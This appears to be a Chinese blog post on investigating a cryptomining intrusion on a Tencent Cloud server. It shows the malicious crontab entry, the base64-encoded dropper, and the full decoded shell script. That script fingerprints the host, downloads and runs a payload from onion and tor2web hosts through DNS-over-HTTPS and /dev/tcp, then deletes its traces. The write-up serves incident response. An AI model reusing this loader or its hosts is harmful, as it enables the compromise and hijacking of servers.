腾讯云入侵

早上8点左右收到腾讯云的相关短信，提示机器可能存在挖坑风险。马上登录机器看了一下，发现crontab有个比较诡异的任务

[dev@VM_0_12_centos ~]$ crontab -l
11 * * * * /home/dev/.config/systemd/user/systemd-tmpfiles-cleanup/systemd-tmpfiles-cleanup-z3glwn.sh > /dev/null 2>&1 &

[dev@VM_0_12_centos ~]$ cd .config/
[dev@VM_0_12_centos .config]$ ll
total 20
drwxrwxr-x  5 dev dev 4096 Jun 20 06:08 .
drwx------ 15 dev dev 4096 Jun  8 19:55 ..
drwxrwxr-x  2 dev dev 4096 Apr 30  2020 abrt
drwxrwxr-x  2 dev dev 4096 May 27  2020 jgit
drwxrwxr-x  3 dev dev 4096 Jun 20 06:08 systemd    这个时间点不正常，腾讯云8点发的短信
1
2
3
4
5
6
7
8
9
10
11

然后去找这个任务看了一下具体执行的内容

[dev@VM_0_12_centos systemd-tmpfiles-cleanup]$ cat systemd-tmpfiles-cleanup-z3glwn.sh 
#!/bin/bash
exec &>/dev/null
echo z3glwn
echo ejNnbHduCmV4ZWMgJj4vZGV2L251bGwKQkRyRll6V2c9Li8uJChkYXRlfG1kNXN1bXxoZWFkIC1jMjApCnF5eW52cEJRPShkb2gtY2guYmxhaGRucy5jb20gZG9oLWRlLmJsYWhkbnMuY29tIGRvaC1qcC5ibGFoZG5zLmNvbSBkb2gtc2cuYmxhaGRucy5jb20gZG9oLmxpIGRvaC5wdWIgZG9oLmRucy5zYiBkbnMudHduaWMudHcpCnNOSG91WWp4PSIvdG1wL3N5c3RlbWQtcHJpdmF0ZS1hZTc3NjIwNjQyMmU4ODY5NjFlZWZiMzU4YzRmZWZkYS1zeXN0ZW1kLWxvZ2luZC5zZXJ2aWNlLXozZ2x3biIKR1JQb05UeEQ9ImN1cmwgLW02MCAtZnNTTGtBLSAtLWRvaC11cmwgaHR0cHM6Ly8ke3F5eW52cEJRWyQoKFJBTkRPTSUkeyNxeXludnBCUVtAXX0pKV19L2Rucy1xdWVyeSIKWndKdEdRYUM9ImN1cmwgLW02MCAtZnNTTGtBLSIKSE5QRHNtd3o9InJlbGF5LnRvcjJzb2Nrcy5pbiIKSHlNYnZoTnE9InJ1NnI0aW5rYWY0dGhsZ2ZsZzRpcXM1bWhxd3F1Ym9sczVxYWdzcHZ5YTR3aHAzZGdidm15aGFkIgpQQVRIPS90bXA6JHNOSG91WWp4OiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbjokUEFUSAoKZUdpQXNvbVgoKSB7CglyZWFkIHByb3RvIHNlcnZlciBwYXRoIDw8PCQoZWNobyAkezEvLy8vIH0pCglET0M9LyR7cGF0aC8vIC8vfQoJSE9TVD0ke3NlcnZlci8vOip9CglQT1JUPSR7c2VydmVyLy8qOn0KCVtbIHgiJHtIT1NUfSIgPT0geCIke1BPUlR9IiBdXSAmJiBQT1JUPTgwCglleGVjIDM8Pi9kZXYvdGNwLyR7SE9TVH0vJFBPUlQKCWVjaG8gLWVuICJHRVQgJHtET0N9IEhUVFAvMS4wXHJcblVzZXItQWdlbnQ6IC1cclxuSG9zdDogJHtIT1NUfVxyXG5cclxuIiA+JjMKCSh3aGlsZSByZWFkIGxpbmU7IGRvCglbWyAiJGxpbmUiID09ICQnXHInIF1dICYmIGJyZWFrCglkb25lICYmIGNhdCkgPCYzCglleGVjIDM+Ji0KfQoKYkNRWWhBclYoKSB7Cglmb3IgaSBpbiAkc05Ib3VZanggLiAvdXNyL2JpbiAvdmFyL3RtcCAvdG1wIDtkbyBlY2hvIGV4aXQgPiAkaS9pICYmIGNobW9kICt4ICRpL2kgJiYgY2QgJGkgJiYgLi9pICYmIHJtIC1mIGkgJiYgYnJlYWs7ZG9uZQp9CgpYTlNCallPTygpIHsKCUhvVkNRSEZ1PS9leGVjCglMb3VNUUVjaz1jcjBfJChjdXJsIC1zNCBpZGVudC5tZXx8Y3VybCAtNCBpcC5zYilfJCh3aG9hbWkpXyQodW5hbWUgLW4pXyQodW5hbWUgLXIpXyQoY2F0IC9ldGMvbWFjaGluZS1pZHx8KGlwIHJ8fGhvc3RuYW1lIC1pfHxlY2hvIG5vLWlkKXxtZDVzdW18YXdrIE5GPTEpCgkkR1JQb05UeEQgLXggc29ja3M1aDovLyRITlBEc213ejo5MDUwIC1lJExvdU1RRWNrICRIeU1idmhOcS5vbmlvbiRIb1ZDUUhGdSAtbyRCRHJGWXpXZyB8fCAkR1JQb05UeEQgLWUkTG91TVFFY2sgJDEkSG9WQ1FIRnUgLW8kQkRyRll6V2cgfHwgJFp3SnRHUWFDIC14IHNvY2tzNWg6Ly8kSE5QRHNtd3o6OTA1MCAtZSRMb3VNUUVjayAkSHlNYnZoTnEub25pb24kSG9WQ1FIRnUgLW8kQkRyRll6V2cgfHwgJFp3SnRHUWFDIC1lJExvdU1RRWNrICQxJEhvVkNRSEZ1IC1vJEJEckZZeldnCn0KCk1QUUthbkRnKCkgewoJY2htb2QgK3ggJEJEckZZeldnOyRCRHJGWXpXZztybSAtZiAkQkRyRll6V2cKfQoKZHRPRkNBdFQoKSB7Cgl1PSRIeU1idmhOcS50b3Iyd2ViLml0L2xvYWQvCgljZCAvdG1wICYmIGN1cmwgLVYgfHwgKGVHaUFzb21YIGh0dHA6Ly8kdS9jdSkgfCB0YXIgenhwCgliQ1FZaEFyVgoJWE5TQmpZT08gJEh5TWJ2aE5xLnRvcjJ3ZWIuaXQgfHwKCVhOU0JqWU9PICRIeU1idmhOcS50b3Iyd2ViLmluIHx8CglYTlNCallPTyAkSHlNYnZoTnEudG9yMndlYi5yZQoJTVBRS2FuRGcKfQoKbHMgL3Byb2MvJChoZWFkIC0xIC90bXAvLnN5c3RlbWQuMSkvbWFwcyB8fCBkdE9GQ0F0VAo=|base64 -d|bash
1
2
3
4
5

将上面的echo内容通过base64转码可以得到如下内容

z3glwn
exec &>/dev/null
BDrFYzWg=./.$(date|md5sum|head -c20)
qyynvpBQ=(doh-ch.blahdns.com doh-de.blahdns.com doh-jp.blahdns.com doh-sg.blahdns.com doh.li doh.pub doh.dns.sb dns.twnic.tw)
sNHouYjx="/tmp/systemd-private-ae776206422e886961eefb358c4fefda-systemd-logind.service-z3glwn"
GRPoNTxD="curl -m60 -fsSLkA- --doh-url https://${qyynvpBQ[$((RANDOM%${#qyynvpBQ[@]}))]}/dns-query"
ZwJtGQaC="curl -m60 -fsSLkA-"
HNPDsmwz="relay.tor2socks.in"
HyMbvhNq="ru6r4inkaf4thlgflg4iqs5mhqwqubols5qagspvya4whp3dgbvmyhad"
PATH=/tmp:$sNHouYjx:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:$PATH

eGiAsomX() {
	read proto server path <<<$(echo ${1 })
	DOC=/${path// //}
	HOST=${server//:*}
	PORT=${server//*:}
	[[ x"${HOST}" == x"${PORT}" ]] && PORT=80
	exec 3<>/dev/tcp/${HOST}/$PORT
	echo -en "GET ${DOC} HTTP/1.0\r\nUser-Agent: -\r\nHost: ${HOST}\r\n\r\n" >&3
	(while read line; do
	[[ "$line" == $'\r' ]] && break
	done && cat) <&3
	exec 3>&-
}

bCQYhArV() {
	for i in $sNHouYjx . /usr/bin /var/tmp /tmp ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done
}

XNSBjYOO() {
	HoVCQHFu=/exec
	LouMQEck=cr0_$(curl -s4 ident.me||curl -4 ip.sb)_$(whoami)_$(uname -n)_$(uname -r)_$(cat /etc/machine-id||(ip r||hostname -i||echo no-id)|md5sum|awk NF=1)
	$GRPoNTxD -x socks5h://$HNPDsmwz:9050 -e$LouMQEck $HyMbvhNq.onion$HoVCQHFu -o$BDrFYzWg || $GRPoNTxD -e$LouMQEck $1$HoVCQHFu -o$BDrFYzWg || $ZwJtGQaC -x socks5h://$HNPDsmwz:9050 -e$LouMQEck $HyMbvhNq.onion$HoVCQHFu -o$BDrFYzWg || $ZwJtGQaC -e$LouMQEck $1$HoVCQHFu -o$BDrFYzWg
}

MPQKanDg() {
	chmod +x $BDrFYzWg;$BDrFYzWg;rm -f $BDrFYzWg
}

dtOFCAtT() {
	u=$HyMbvhNq.tor2web.it/load/
	cd /tmp && curl -V || (eGiAsomX http://$u/cu) | tar zxp
	bCQYhArV
	XNSBjYOO $HyMbvhNq.tor2web.it ||
	XNSBjYOO $HyMbvhNq.tor2web.in ||
	XNSBjYOO $HyMbvhNq.tor2web.re
	MPQKanDg
}

ls /proc/$(head -1 /tmp/.systemd.1)/maps || dtOFCAtT

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51

没有仔细排查，首先就是停止任务执行，但是后面发现这个crontab任务又启动了，基于pid可以找到，把这个一并停止了

[dev@VM_0_12_centos .config]$ ps -ef | grep 6QTAv88
dev      1996782       1  0 06:06 ?        00:00:00 6QTAv88
dev      2069016 2063681  0 09:55 pts/3    00:00:00 grep --color=auto 6QTAv88
1
2
3

当前dev用户启动的只有，rocketmq、es，redis为root可以排除。可以定位到大致是es控制台的脚本执行漏洞
http://www.hzhcontrols.com/new-569680.html